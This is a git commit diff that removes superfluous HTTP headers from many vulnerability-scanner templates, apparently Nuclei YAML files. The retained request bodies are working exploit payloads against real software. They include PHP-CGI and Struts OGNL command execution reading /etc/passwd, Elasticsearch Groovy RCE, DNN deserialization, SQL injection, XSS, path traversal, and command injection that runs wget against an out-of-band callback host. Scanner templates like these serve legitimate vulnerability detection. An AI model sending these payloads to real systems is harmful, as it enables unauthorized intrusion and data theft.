removed extra headers not required for template
parent
0880b65284
commit
609705f676
|
@ -12,24 +12,17 @@ requests:
|
|||
- |
|
||||
POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Content-Length: 5
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Accept-Encoding: deflate
|
||||
|
||||
"1":1
|
||||
- |
|
||||
GET /public/index.php/home/file/user_pics HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Accept-Encoding: gzip
|
||||
Accept-Encoding: deflate
|
||||
|
||||
|
||||
- |
|
||||
GET {{endpoint}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Accept-Encoding: deflate
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
|
|
|
@ -12,7 +12,6 @@ requests:
|
|||
- |
|
||||
GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
matchers-condition: and
|
||||
|
|
|
@ -14,7 +14,6 @@ requests:
|
|||
- | #linux
|
||||
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
bsh.script=exec("id");
|
||||
|
@ -22,7 +21,6 @@ requests:
|
|||
- | #windows
|
||||
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
bsh.script=exec("ipconfig");
|
||||
|
|
|
@ -17,11 +17,7 @@ requests:
|
|||
Host: {{Hostname}}
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 80
|
||||
|
||||
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
|
||||
|
||||
|
|
|
@ -16,9 +16,7 @@ requests:
|
|||
- |
|
||||
POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 31
|
||||
|
||||
<?php echo shell_exec("cat /etc/passwd"); ?>
|
||||
|
||||
|
|
|
@ -18,10 +18,7 @@ requests:
|
|||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 343
|
||||
|
||||
{
|
||||
"size": 1,
|
||||
|
|
|
@ -17,10 +17,7 @@ requests:
|
|||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 343
|
||||
|
||||
{
|
||||
"name": "test"
|
||||
|
@ -29,11 +26,7 @@ requests:
|
|||
POST /_search HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 343
|
||||
|
||||
{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getText()"}}}
|
||||
|
||||
|
|
|
@ -12,18 +12,12 @@ requests:
|
|||
- |+
|
||||
GET /?author=1 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cache-Control: max-age=0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Connection: close
|
||||
|
||||
- |+
|
||||
POST /wp-login.php?action=lostpassword HTTP/1.1
|
||||
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)
|
||||
Connection: close
|
||||
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
||||
Accept: */*
|
||||
Content-Length: 56
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
wp-submit=Get+New+Password&redirect_to=&user_login={{username}}
|
||||
|
|
|
@ -16,7 +16,6 @@ requests:
|
|||
- |
|
||||
GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Length: 4
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -17,10 +17,7 @@ requests:
|
|||
- |
|
||||
POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
Content-Length: 160
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Accept-Encoding: gzip, deflate
|
||||
|
||||
|
|
|
@ -17,10 +17,7 @@ requests:
|
|||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
||||
Connection: close
|
||||
Content-Type: text/xml
|
||||
Content-Length: 5178
|
||||
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
|
||||
|
|
|
@ -13,11 +13,7 @@ requests:
|
|||
- |
|
||||
PUT /_users/org.couchdb.user:poc HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: application/json
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Content-Length: 108
|
||||
|
||||
{
|
||||
"type": "user",
|
||||
|
|
|
@ -16,35 +16,28 @@ requests:
|
|||
- |
|
||||
POST /maint/index.php?packages HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Referer: {{Hostname}}/maint/index.php?packages
|
||||
Content-Length: 160
|
||||
Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
|
||||
Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
|
||||
Connection: keep-alive
|
||||
|
||||
xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages
|
||||
|
||||
- |
|
||||
GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Referer: {{Hostname}}/maint/index.php?packages
|
||||
Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
|
||||
Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
|
||||
Connection: keep-alive
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
|
|
@ -13,10 +13,7 @@ requests:
|
|||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Length: 264
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
|
||||
------WebKitFormBoundaryKc8fBVDo558U4hbJ
|
||||
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
|
||||
|
@ -34,9 +31,6 @@ requests:
|
|||
Host: {{Hostname}}
|
||||
Accept-Encoding: gzip,deflate
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
||||
Connection: close
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
|
|
|
@ -14,11 +14,9 @@ info:
|
|||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /cgi-bin/§endpoint§?LD_DEBUG=help HTTP/1.1
|
||||
GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
|
||||
Accept: */*
|
||||
Connection: close
|
||||
|
||||
payloads:
|
||||
endpoint:
|
||||
|
|
|
@ -16,10 +16,8 @@ requests:
|
|||
POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: text/xml
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0,
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,
|
||||
Content-Type: text/xml;charset=UTF-8
|
||||
Content-Length: 873
|
||||
|
||||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
|
||||
<soapenv:Header>
|
||||
|
|
|
@ -13,11 +13,7 @@ requests:
|
|||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
|
||||
Accept-Language: en
|
||||
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
|
||||
Connection: Keep-Alive
|
||||
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
|
||||
Pragma: no-cache
|
||||
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
|
||||
|
||||
matchers:
|
||||
|
|
|
@ -17,10 +17,6 @@ requests:
|
|||
GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
Connection: close
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
|
@ -13,12 +13,8 @@ requests:
|
|||
- |
|
||||
GET /__ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
|
||||
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
|
||||
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Connection: close
|
||||
Cookie: dnn_IsMobile=False; DNNPersonalization=<profile><item key="name1: key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">C:\Windows\win.ini</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>
|
||||
|
||||
matchers-condition: and
|
||||
|
|
|
@ -18,78 +18,42 @@ requests:
|
|||
- |
|
||||
GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
|
||||
Connection: close
|
||||
Content-Length: 17
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
Content-Type: text/html
|
||||
Accept-Encoding: gzip, deflate
|
||||
|
||||
<?php echo md5(phpunit_rce);?>
|
||||
|
||||
- |
|
||||
GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
|
||||
Connection: close
|
||||
Content-Length: 17
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
Content-Type: text/html
|
||||
Accept-Encoding: gzip, deflate
|
||||
|
||||
<?php echo md5(phpunit_rce);?>
|
||||
|
||||
- |
|
||||
GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
|
||||
Connection: close
|
||||
Content-Length: 17
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
Content-Type: text/html
|
||||
Accept-Encoding: gzip, deflate
|
||||
|
||||
<?php echo md5(phpunit_rce);?>
|
||||
|
||||
- |
|
||||
GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
|
||||
Connection: close
|
||||
Content-Length: 17
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
Content-Type: text/html
|
||||
Accept-Encoding: gzip, deflate
|
||||
|
||||
<?php echo md5(phpunit_rce);?>
|
||||
|
||||
- |
|
||||
GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
|
||||
Connection: close
|
||||
Content-Length: 17
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
Content-Type: text/html
|
||||
Accept-Encoding: gzip, deflate
|
||||
|
||||
<?php echo md5(phpunit_rce);?>
|
||||
|
||||
- |
|
||||
GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
|
||||
Connection: close
|
||||
Content-Length: 17
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
Content-Type: text/html
|
||||
Accept-Encoding: gzip, deflate
|
||||
|
||||
<?php echo md5(phpunit_rce);?>
|
||||
|
||||
|
|
|
@ -12,21 +12,15 @@ requests:
|
|||
- |
|
||||
POST /jolokia/read/getDiagnosticOptions HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.
|
||||
Accept-Language: en-GB,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 167
|
||||
|
||||
{
|
||||
"type" : "read",
|
||||
"mbean" : "java.lang:type=Memory",
|
||||
"target" : {
|
||||
"url" : "service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat"
|
||||
}
|
||||
"type":"read",
|
||||
"mbean":"java.lang:type=Memory",
|
||||
"target":{
|
||||
"url":"service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat"
|
||||
}
|
||||
}
|
||||
|
||||
matchers-condition: and
|
||||
|
@ -35,6 +29,7 @@ requests:
|
|||
words:
|
||||
- "Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
|
@ -17,8 +17,6 @@ requests:
|
|||
- |
|
||||
POST /{{path}}/tree/a/search HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Content-Length: 45
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
query=--open-files-in-pager=cat%20/etc/passwd
|
||||
|
|
|
@ -12,8 +12,6 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x'
|
||||
headers:
|
||||
User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -15,8 +15,6 @@ requests:
|
|||
- |
|
||||
POST /system/sharedir.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: curl/7.58.0
|
||||
Accept: */*
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
&uid=10; wget http://{{interactsh-url}}
|
||||
|
@ -24,8 +22,6 @@ requests:
|
|||
- |
|
||||
POST /en/php/usb_sync.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: curl/7.58.0
|
||||
Accept: */*
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
&act=sync&task_number=1;wget http://{{interactsh-url}}
|
||||
|
|
|
@ -15,10 +15,6 @@ requests:
|
|||
- |
|
||||
POST /upload HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: python-requests/2.18.4
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B
|
||||
|
|
|
@ -15,7 +15,6 @@ requests:
|
|||
- |
|
||||
GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -15,7 +15,6 @@ requests:
|
|||
- |
|
||||
GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
|
||||
Referer: {{BaseURL}}
|
||||
|
||||
matchers:
|
||||
|
|
|
@ -13,7 +13,6 @@ requests:
|
|||
- |+
|
||||
GET /etc/passwd HTTP/1.1
|
||||
Host:
|
||||
Content-Length: 4
|
||||
|
||||
unsafe: true
|
||||
matchers-condition: and
|
||||
|
@ -21,6 +20,7 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
|
|
@ -19,13 +19,10 @@ requests:
|
|||
- |
|
||||
GET /assets/file:%2f%2f/etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Content-Length: 94
|
||||
|
||||
- |
|
||||
GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
|
|
|
@ -12,13 +12,10 @@ requests:
|
|||
- |
|
||||
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: application/json
|
||||
Referer: {{Hostname}}/user/register
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663
|
||||
Content-Length: 626
|
||||
Connection: close
|
||||
|
||||
-----------------------------99533888113153068481322586663
|
||||
Content-Disposition: form-data; name="mail[#post_render][]"
|
||||
|
|
|
@ -14,11 +14,6 @@ requests:
|
|||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
||||
Connection: close
|
||||
Authorization: Digest username=admin
|
||||
|
||||
matchers-condition: and
|
||||
|
|
|
@ -16,14 +16,7 @@ requests:
|
|||
- |
|
||||
POST /timesheet/login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 91
|
||||
DNT: 1
|
||||
Connection: keep-alive
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login
|
||||
|
||||
|
@ -32,6 +25,7 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '><script>javascript:alert(document.domain)</script>'
|
||||
|
|
|
@ -22,7 +22,6 @@ requests:
|
|||
- |
|
||||
POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
yuzo_related_post_css_and_style=</style><script>alert(0);</script>
|
||||
|
@ -30,8 +29,6 @@ requests:
|
|||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
req-condition: true
|
||||
matchers-condition: and
|
||||
|
|
|
@ -17,8 +17,6 @@ requests:
|
|||
GET /wan.htm HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
Connection: close
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -13,14 +13,9 @@ requests:
|
|||
- |
|
||||
POST /password_change.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Referer: https://{{Hostname}}/
|
||||
Referer: {{BaseURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 73
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2
|
||||
|
||||
|
|
|
@ -12,9 +12,6 @@ requests:
|
|||
- |
|
||||
POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
|
||||
Content-Length: 1
|
||||
Connection: close
|
||||
|
||||
echo
|
||||
echo
|
||||
|
|
|
@ -13,41 +13,27 @@ requests:
|
|||
- |
|
||||
POST /apply_sec.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Connection: close
|
||||
Referer: http://{{Hostname}}/
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Referer: {{BaseURL}}
|
||||
|
||||
html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384
|
||||
- |
|
||||
POST /apply_sec.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Connection: close
|
||||
Referer: http://{{Hostname}}/login_pic.asp
|
||||
Referer: {{BaseURL}}/login_pic.asp
|
||||
Cookie: uid=1234123
|
||||
